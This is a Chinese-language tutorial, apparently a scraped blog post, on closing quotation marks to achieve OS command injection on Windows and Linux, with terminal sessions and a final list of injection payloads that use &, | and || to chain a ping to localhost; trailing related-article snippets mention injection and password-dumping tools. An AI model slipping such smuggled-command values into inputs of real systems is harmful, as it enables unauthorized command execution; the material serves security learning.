1、在Windows下

 windows下非常好办,只需要&肯定可以执行:

 C:\Users\xxx\Desktop>aaaa | ping -n  127.0.0.1

 'aaaa' 不是内部或外部命令,也不是可运行的程序

 或批处理文件。

 C:\Users\xxx\Desktop>C:\Users\chenran01.ESG\Desktop\test.bat

 C:\Users\xxx\Desktop>aaaa' | ping -n 5 127.0.0.1

 'aaaa'' 不是内部或外部命令,也不是可运行的程序

 或批处理文件。

 C:\Users\xxx\Desktop>C:\Users\chenran01.ESG\Desktop\test.bat

 C:\Users\xxx\Desktop>aaaa' & ping -n 5 127.0.0.1

 'aaaa'' 不是内部或外部命令,也不是可运行的程序

 或批处理文件。

 正在 Ping 127.0.0.1 具有  字节的数据:

 来自 127.0.0.1 的回复: 字节= 时间<1ms TTL=

 来自 127.0.0.1 的回复: 字节= 时间<1ms TTL=

 来自 127.0.0.1 的回复: 字节= 时间<1ms TTL=

 来自 127.0.0.1 的回复: 字节= 时间<1ms TTL=

 来自 127.0.0.1 的回复: 字节= 时间<1ms TTL=

 127.0.0.1 的 Ping 统计信息:

     数据包: 已发送 = ,已接收 = ,丢失 =  (% 丢失),

 往返行程的估计时间(以毫秒为单位):

     最短 = 0ms,最长 = 0ms,平均 = 0ms

 C:\Users\xxx\Desktop>

或者把&换成||上文中的例子也可以执行。

2、在Linux下:

在Linux下就显得复杂一些了

先来看一个可以执行的例子:

 $ 'aaaa'|ping -c  127.0.0.1 # ''

 -bash: aaaa: command not found

 PING 127.0.0.1 (127.0.0.1) () bytes of data.

  bytes from 127.0.0.1: icmp_seq= ttl= time=0.042 ms

  bytes from 127.0.0.1: icmp_seq= ttl= time=0.072 ms

  bytes from 127.0.0.1: icmp_seq= ttl= time=0.068 ms

  bytes from 127.0.0.1: icmp_seq= ttl= time=0.054 ms

# ' 来闭合最后的'从而达到了命令注入执行,如果去掉#就发现不行了

 $ 'aaaa|ping -c 4 127.0.0.1  ''

 >

类似的这种需要闭合前面的'

 $ 'aaaa'|ping -c  127.0.0.1

 -bash: aaaa: command not found

 PING 127.0.0.1 (127.0.0.1) () bytes of data.

  bytes from 127.0.0.1: icmp_seq= ttl= time=0.063 ms

  bytes from 127.0.0.1: icmp_seq= ttl= time=0.072 ms

  bytes from 127.0.0.1: icmp_seq= ttl= time=0.066 ms

  bytes from 127.0.0.1: icmp_seq= ttl= time=0.062 ms

 --- 127.0.0.1 ping statistics ---

  packets transmitted,  received, % packet loss, time 3000ms

 rtt min/avg/max/mdev = 0.062/0.065/0.072/0.010 ms

 $ 'aaaa|ping -c 4 127.0.0.1

 >

上面是使用|的一些例子,下面来看看&

 $ 'aaa'&ping -c  127.0.0.1

 []

 -bash: aaa: command not found

 PING 127.0.0.1 (127.0.0.1) () bytes of data.

  bytes from 127.0.0.1: icmp_seq= ttl= time=0.066 ms

  bytes from 127.0.0.1: icmp_seq= ttl= time=0.069 ms

  bytes from 127.0.0.1: icmp_seq= ttl= time=0.057 ms

  bytes from 127.0.0.1: icmp_seq= ttl= time=0.067 ms

 --- 127.0.0.1 ping statistics ---

  packets transmitted,  received, % packet loss, time 2999ms

 rtt min/avg/max/mdev = 0.057/0.064/0.069/0.010 ms

 []+  Exit                 'aaa'

 $

综上闭合OS执行的payload只需:

 #windows:

 'aaa&ping 127.0.0.1&'

 'aaa||ping 127.0.0.1||'

 #linux下:

 'aaa'&ping -c  127.0.0.1

 'aaa'|ping -c  127.0.0.1

 'aaa'|ping -c  127.0.0.1# ''

关于OS命令注入的闭合问题的更多相关文章

  1. 网络安全学习阶段性总结:SQL注入|SSRF攻击|OS命令注入|身份验证漏洞|事物逻辑漏洞|目录遍历漏洞

    目录 SQL注入 什么是SQL注入? 掌握SQL注入之前需要了解的知识点 SQL注入情况流程分析 有完整的回显报错(最简单的情况)--检索数据: 在HTTP报文中利用注释---危险操作 检索隐藏数据: ...

  2. OS命令注入

    SSL http://kb.cnblogs.com/page/162080/ http://baike.baidu.com/link?url=jPitKuDw_ncDlMbOc1SkWzM9TuKX9 ...

  3. 跟bWAPP学WEB安全(PHP代码)--OS命令注入

    背景 这是温故知新的一个系列,也是重新拾起WEB安全的一个系列,同时希望能稍微有点对初学者的帮助.第一篇先来讲讲OS命令注入 bWAPP里面有两个页面也就是两个漏洞,来验证OS命令注入.一个是有回显的 ...

  4. WEB安全番外第五篇--关于使用通配符进行OS命令注入绕WAF

    一.通配符简介: 一般来讲,通配符包含*和?,都是英文符号,*用来匹配任意个任意字符,?用来匹配一个任意字符. 举个例子使用通配符查看文件,可以很名下看到打卡的文件是/etc/resolv.conf: ...

  5. OS命令注入中的空格

    1.bash 空格可以替换为%20.%09(tab).%2b(+) in url.{IFS} 2.Win shell 空格可以替换为%20.%09(tab).%0b.%0c.%2b(+) in url

  6. WEB安全第一篇--对服务器的致命一击:代码与命令注入

    零.前言 最近做专心web安全有一段时间了,但是目测后面的活会有些复杂,涉及到更多的中间件.底层安全.漏洞研究与安全建设等越来越复杂的东东,所以在这里想写一个系列关于web安全基础以及一些讨巧的pay ...

  7. Commix命令注入漏洞利用

    介绍 项目地址:https://github.com/stasinopoulos/commix Commix是一个使用Python开发的漏洞测试工具,这个工具是为了方便的检测一个请求是否存在命令注入漏 ...

  8. dvwa——命令注入&文件包含

    命令注入 commond_injection 源码.分析.payload: low: <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input ...

  9. commix 命令注入工具

    关于系统命令注入,可以参考这篇文章:命令攻击介绍 系统命令注入场景 在对企业进行安全测试时候,很少会发现系统注入漏洞.这是因为大部分情况下代码业务主要是数据操作.文件操作.逻辑处理和api接口调用等, ...

随机推荐

  1. 查询一个字符串的子串出现的次数在sql中

    select name,char_length(name)-char_length(replace(name,'aaaaaa','')) from teacher; 将原来的字符串字段取出长度  将子 ...

  2. WPF教程一:基础

    一.WPF简介WPF:WPF即Windows Presentation Foundation,翻译为中文“Windows呈现基础”,是微软推出的基于Windows Vista的用户界面框架,属于.NE ...

  3. r函数知识总结

    1. rbind(), cbind():  构造.合并vector 或matrix为一个矩阵:cbind(1, 1:10) ----默认列合并, rbind(1, 1:10) ----行合并(or构造 ...

  4. JavaScript操作XML工作记录

    JavaScript操作XML (一) JavaScript操作XML是通过XML DOM来完成的.那么什么是XML DOM呢?XML DOM 是: 用于 XML 的标准对象模型 用于 XML 的标准 ...

  5. BCM_GPIO驱动测试

    在写内核驱动的时候,最好先在uboot上,进行裸板测试,验证寄存器,再移植到内核中,这样可以熟悉寄存器,也排除内核中的一些干扰. /********************************** ...

  6. (转)使用AfxGetMainWnd函数的一个心得

    作者:朱金灿 来源:http://blog.csdn.net/clever101/ 使用AfxGetMainWnd函数获取MFC程序中的主框架类指针是一个常用作法.但是你会发现这一做法有时也会失灵.不 ...

  7. Linux下密码抓取神器mimipenguin

    前有Mimikatz,今有mimipenguin,近日国外安全研究员huntergregal发布了工具mimipenguin,一款Linux下的密码抓取神器,可以说弥补了Linux下密码抓取的空缺. ...

  8. glsl 多重纹理

    #include"glsl.h" void SHADER::drawBox() { glBegin(GL_QUADS); // Front Face glNormal3f( 0.0 ...

  9. jQuery-处理css样式

    1.css方法 获取匹配元素集合中的第一个元素的样式属性的值 或 设置每个匹配元素的一个或多个CSS属性 1)获取并设置单个css值 jQuery对象.css('css属性'); jQuery对象.c ...

  10. 小技巧处理div内容溢出

    前几天遇到一个问题,代码是这样一个层次: <div class="province">    <ul>        <li>1</li& ...